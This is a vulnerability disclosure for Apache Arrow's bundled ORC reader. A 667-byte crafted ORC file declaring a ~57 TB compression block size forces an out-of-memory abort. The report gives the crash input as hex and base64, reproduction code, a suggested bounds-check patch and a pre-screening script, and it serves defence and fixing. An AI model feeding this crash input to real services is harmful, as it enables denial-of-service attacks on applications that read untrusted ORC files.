Summary
A 667-byte crafted ORC file makes arrow::adapters::orc::ORCFileReader::Open
attempt a ~57 TB heap allocation while decoding the file footer, because the
bundled liborc reader trusts the attacker-supplied PostScript
compression_block_size with no upper bound. Any application that opens an
untrusted ORC file through Arrow's public ORC reader can be driven into an
out-of-memory abort / denial of service by a tiny input.
The defective code is in the bundled Apache ORC C++ library (liborc),
reachable through Arrow's public API. The fix belongs in apache/orc; this report
should be filed against apache/orc as well as apache/arrow (which bundles it).
Tested at apache/arrow pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT; ARROW_DEPENDENCY_SOURCE=BUNDLED -> orc-format 1.1.1).
Root Cause
The ORC PostScript carries a compression_block_size (uint64). When liborc
decodes the footer it reads this field verbatim and feeds it straight into a
decompression-buffer allocation that happens before any compressed data is
read, so the entire attacker-declared block size is allocated up front:
- getCompressionBlockSize() returns ps.compression_block_size() with no
  bound check (only a 256 KiB default when the field is absent):
  c++/src/Reader.cc:59.
- readFooter() passes that value as the blockSize argument to
  createDecompressor(): c++/src/Reader.cc:1357.
- For compression = ZLIB, createDecompressor() builds a
  ZlibDecompressionStream (c++/src/Compression.cc:1293); its base
  DecompressionStream constructor eagerly constructs
  outputDataBuffer(pool, bufferSize) at c++/src/Compression.cc:463.
  DataBuffer<char>::reserve() then calls
  memoryPool_.malloc(sizeof(char) * newCapacity) at
  c++/src/MemoryPool.cc:106, with newCapacity equal to the declared block
  size, before a single byte of footer is decompressed.
Vulnerable code (c++/src/Reader.cc:59):
uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
  if (ps.has_compression_block_size()) {
    return ps.compression_block_size();  // attacker-controlled, unbounded
  } else {
    return 256 * 1024;
  }
}
Eager allocation (c++/src/Compression.cc:463 -> c++/src/MemoryPool.cc:106):
// Compression.cc: DecompressionStream ctor allocates the full block up front
DecompressionStream::DecompressionStream(std::unique_ptr<SeekableInputStream> inStream,
                                         size_t bufferSize, MemoryPool& pool,
                                         ReaderMetrics* metrics)
    : pool(pool),
      input(std::move(inStream)),
      outputDataBuffer(pool, bufferSize),  // bufferSize == compression_block_size
      ...
// MemoryPool.cc: reserve() mallocs the whole capacity before any data is read
template <class T>
void DataBuffer<T>::reserve(uint64_t newCapacity) {
  if (newCapacity > currentCapacity_ || !buf_) {
    ...
    buf_ = reinterpret_cast<T*>(memoryPool_.malloc(sizeof(T) * newCapacity));
    currentCapacity_ = newCapacity;
  }
}
Call chain (attacker bytes -> fault):
arrow::adapters::orc::ORCFileReader::Open adapter.cc:568 (public API)
-> ORCFileReader::Impl::Open adapter.cc:218
-> orc::createReader Reader.cc:1421
-> orc::readFooter Reader.cc:1357 getCompressionBlockSize(ps)
-> orc::createDecompressor Compression.cc:1293
-> orc::ZlibDecompressionStream::ctor Compression.cc:694
-> orc::DecompressionStream::ctor Compression.cc:463
-> orc::DataBuffer<char>::DataBuffer MemoryPool.cc:57
-> orc::DataBuffer<char>::reserve MemoryPool.cc:106 -> malloc(bufferSize)
liborc never validates the declared block size against the remaining
file / footer length before allocating.
PoC
A 667-byte crafted ORC file: a valid ORC magic plus a PostScript declaring
compression = ZLIB and an attacker-chosen compression_block_size of
0x33ffdbbd0000 (~57 TB).
# generate_poc.py — re-create the crash input from bytes
import binascii
POC_HEX = (
"4f52431100000a061204080550003b00000a1b0a0300000012140805120e080310feffffff0f"
"1882808080105000300000e392e2626660601012e66015e2e56012f8f71f0a180318002b0000"
"e352e76262601052e4609592e6648080064108fda15e12c6086000004700000a210a05000000"
"00001218080522120a00120bc3bc6ec3af63c3b664c3a9189c0150002700000a110a04000000"
"00120908052a030a010350002800002b63616060600262662066036286ffffffff0300200000"
"fbc7c2c4c400018c30bafe3f18fc0600360000636000811ff6608a81a141bef575e00e394e07"
"08f7433d549c01000f00004e040102000b402800004b4c4a3abc27eff0fae4c3db520eafaca0"
"100000050000ffa8a20000e362e360136090e0e602d18c120a609a49421a4c334bc883691609"
"3530cd2a2106a41981eac4c1349384309866969003d24c40755c603e0b549e55825588858341"
"800148322191c82240b614b3bb6f0800c40000e3aae462e1600d60e01ae16015e2e36016f8f7"
"ffff7f7e89a686860601a0a83050949783092c0a068c4041450e5629694e0608681084d01fea"
"25610ca012090e5625212e0621eec37bf20eaf4f3ebc2de5f04a893920cd9c1cac5acc5c8ccc"
"010c00680100e3601678cc24c5cdc12cb09051224f212b835549858347889591899985558a39"
"d3d8084898994831a70109c66229c62405060d060306250e0e66388b05ce6283b3d8e12c0608"
"cb80d58a85833580c14a848355880f68e1bffffffff34b343534340800458581a2bc1c4c6051"
"3060040a2a72b04a4973324040832084fe502f096300954870b02a09713008711fde9377787d"
"f2e16d2987574acc0169e6e460d562e662640e607098e0e7c198c46aa467a067080008b70110"
"01188080f4ddfdff0c2865300682f403034f524318"
)
data = binascii.unhexlify(POC_HEX)
assert len(data) == 667, len(data)
# Use a context manager so the file is flushed and closed deterministically.
with open("poc.bin", "wb") as f:
    f.write(data)
Crash input size: 667 bytes (poc/poc.bin, md5 ec35f54cd76777e4f34f68f79c714a4e).
The compression_block_size varint in the PostScript decodes to 0x33ffdbbd0000
(~57 TB), the same value that appears as the requested allocation size in the
AddressSanitizer report.
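The declared block size can be checked without building Arrow. The sketch below decodes the PostScript by hand from the last 25 bytes of POC_HEX (24 PostScript bytes plus the trailing length byte 0x18). It assumes the field numbers from ORC's orc_proto.proto (footerLength = 1, compression = 2, compressionBlockSize = 3, metadataLength = 5, writerVersion = 6, magic = 8000); the helper names read_varint and parse_postscript are illustrative and not part of any library.

```python
# Last 25 bytes of POC_HEX: the 24-byte PostScript followed by its length byte.
TAIL = bytes.fromhex("08b7011001188080f4ddfdff0c2865300682f403034f524318")


def read_varint(buf, pos):
    """Decode one protobuf base-128 varint; return (value, next_pos)."""
    value, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7


def parse_postscript(ps):
    """Return {field_number: value} for varint and length-delimited fields."""
    fields, pos = {}, 0
    while pos < len(ps):
        tag, pos = read_varint(ps, pos)
        number, wire_type = tag >> 3, tag & 7
        if wire_type == 0:      # varint
            fields[number], pos = read_varint(ps, pos)
        elif wire_type == 2:    # length-delimited (bytes / string)
            length, pos = read_varint(ps, pos)
            fields[number] = ps[pos:pos + length]
            pos += length
        else:
            raise ValueError(f"unexpected wire type {wire_type}")
    return fields


ps_len = TAIL[-1]                              # final byte = PostScript length
fields = parse_postscript(TAIL[-1 - ps_len:-1])
block_size = fields[3]                         # compressionBlockSize
print("compression kind:", fields[2])          # 1 is ZLIB in CompressionKind
print("block size:", hex(block_size), f"(~{block_size / 1e12:.1f} TB)")
```

The decoded field 3 is the value liborc hands to the allocator unchanged; no arithmetic on the reader side is needed to reach the 57 TB request.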
Reproduction
Build Arrow C++ from source with -DARROW_ORC=ON and AddressSanitizer, then open the attached ORC file
through the public reader API:
#include <arrow/adapters/orc/adapter.h>
// auto in = ...read poc.bin into a RandomAccessFile...;
auto reader = arrow::adapters::orc::ORCFileReader::Open(in, arrow::default_memory_pool()); // huge alloc here
liborc's getCompressionBlockSize() returns the attacker-controlled PostScript compression_block_size
with no upper bound, and that value reaches DataBuffer<char>::reserve() -> malloc. AddressSanitizer reports:
AddressSanitizer: requested allocation size 0x33ffdbbd0000 (~57 TB) exceeds maximum supported size
DataBuffer<char>::reserve / readFooter (liborc Reader.cc)
ORCFileReader::Open (cpp/src/arrow/adapters/orc/adapter.cc)
The entire trigger is a 667-byte ORC file. The fix belongs in Apache ORC (liborc getCompressionBlockSize),
which is reached via the Arrow ORC reader. The PoC can be recreated from the base64 below.
Suggested Fix
The fix belongs in Apache ORC (liborc), since the unbounded allocation lives
there. Validate the declared compression_block_size against a sane upper bound
and/or against the remaining footer/file length before constructing the
decompression buffer, rejecting the file with a parse error otherwise. The check
belongs in getCompressionBlockSize() (Reader.cc:59) or at the
createDecompressor call site in readFooter() (Reader.cc:1357), so no caller
can hand an unbounded bufferSize to DecompressionStream:
 uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
   if (ps.has_compression_block_size()) {
-    return ps.compression_block_size();
+    uint64_t blockSize = ps.compression_block_size();
+    // Reject implausible block sizes so a malicious PostScript cannot force an
+    // unbounded up-front allocation.
+    if (blockSize > kMaxCompressionBlockSize) {
+      throw ParseError("Invalid compression block size in PostScript");
+    }
+    return blockSize;
   } else {
     return 256 * 1024;
   }
 }
(The exact bound is upstream's judgement.) Apache Arrow should pick up the fix
when it bumps the bundled liborc; until then Arrow may also consider bounding the
allocation at the adapter layer.
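Until a fixed liborc is available, a caller that must accept untrusted ORC files could pre-screen them before handing them to the reader. The following is a minimal sketch of such a check, not a substitute for the upstream fix. The names MAX_BLOCK_SIZE, declared_block_size and check_orc_block_size are hypothetical. The 2**23 ceiling is an assumption, chosen because ORC's 3-byte compression chunk header leaves 23 bits for the chunk length; upstream may settle on a different bound.

```python
import os

# Assumed ceiling (hypothetical): 23 bits of chunk length in ORC's 3-byte header.
MAX_BLOCK_SIZE = 1 << 23
COMPRESSION_BLOCK_SIZE_FIELD = 3  # PostScript.compressionBlockSize


def read_varint(buf, pos):
    """Decode one protobuf base-128 varint; return (value, next_pos)."""
    value, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint in PostScript")
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7


def declared_block_size(path):
    """Return the PostScript's compression_block_size, or None if absent."""
    with open(path, "rb") as f:
        size = f.seek(0, os.SEEK_END)
        if size < 2:
            raise ValueError("file too small to hold a PostScript")
        f.seek(-1, os.SEEK_END)
        ps_len = f.read(1)[0]          # last byte of the file = PostScript length
        if ps_len + 1 > size:
            raise ValueError("PostScript length exceeds file size")
        f.seek(-(ps_len + 1), os.SEEK_END)
        ps = f.read(ps_len)

    pos = 0
    while pos < len(ps):
        tag, pos = read_varint(ps, pos)
        number, wire_type = tag >> 3, tag & 7
        if wire_type == 0:             # varint field
            value, pos = read_varint(ps, pos)
            if number == COMPRESSION_BLOCK_SIZE_FIELD:
                return value
        elif wire_type == 2:           # length-delimited field: skip payload
            length, pos = read_varint(ps, pos)
            pos += length
        else:
            raise ValueError(f"unexpected wire type {wire_type} in PostScript")
    return None


def check_orc_block_size(path, limit=MAX_BLOCK_SIZE):
    """Raise ValueError if the file declares a block size above `limit`."""
    size = declared_block_size(path)
    if size is not None and size > limit:
        raise ValueError(
            f"compression_block_size {size:#x} exceeds limit {limit:#x}")
```

Calling check_orc_block_size("poc.bin") before ORCFileReader::Open (or its language bindings) would reject the PoC, because the declared 0x33ffdbbd0000 is far above the assumed limit. The check only looks at this one field and does not validate the rest of the file.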
PoC bytes (self-contained)
The trigger input is 667 bytes (poc/poc.bin).
Recreate it exactly with:
base64 -d > poc.bin <<'B64'
T1JDEQAACgYSBAgFUAA7AAAKGwoDAAAAEhQIBRIOCAMQ/v///w8YgoCAgBBQADAAAOOS4mJmYGAQEuZgFeLlYBL49x8KGAMYACsA
AONS52JiYBBS5GCVkuZkgIAGQQj9oV4SxghgAABHAAAKIQoFAAAAAAASGAgFIhIKABILw7xuw69jw7Zkw6kYnAFQACcAAAoRCgQA
AAAAEgkIBSoDCgEDUAAoAAArY2FgYGACYmYgZgNihv////8DACAAAPvHwsTEAAGMMLr+Pxj8BgA2AABjYACBH/ZgioGhQb71deAO
OU4HCPdDPVScAQAPAABOBAECAAtAKAAAS0xKOrwn7/D65MPbUg6vrKAQAAAFAAD/qKIAAONi42ATYJDg5gLRjBIKYJpJQhpMM0vI
g2kWCTUwzSohBqQZgerEwTSThDCYZpaQA9JMQHVcYD4LVJ5VglWIhYNBgAFIMiGRyCJAthSzu28IAMQAAOOq5GLhYA1g4BrhYBXi
42AW+Pf//39+iaaGhgYBoKgwUJSXgwksCgaMQEFFDlYpaU4GCGgQhNAf6iVhDKASCQ5WJSEuBiHuw3vyDq9PPrwt5fBKiTkgzZwc
rFrMXIzMAQwAaAEA42AWeMwkxc3BLLCQUSJPISuDVUmFg0eIlZGJmYVVijnT2AhImJlIMacBCcZiKcYkBQYNBgMGJQ4OZjiLBc5i
g7PY4SwGCMuA1YqFgzWAwUqEg1WID2jhv/////NLNDU0NAgARYWBorwcTGBRMGAECipysEpJczJAQIMghP5QLwljAJVIcLAqCXEw
CHEf3pN3eH3y4W0ph1dKzAFp5uRg1WLmYmQOYHCY4OfBmMRqpGegZwgACLcBEAEYgID03f3/DChlMAaC9AMDT1JDGA==
B64
Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).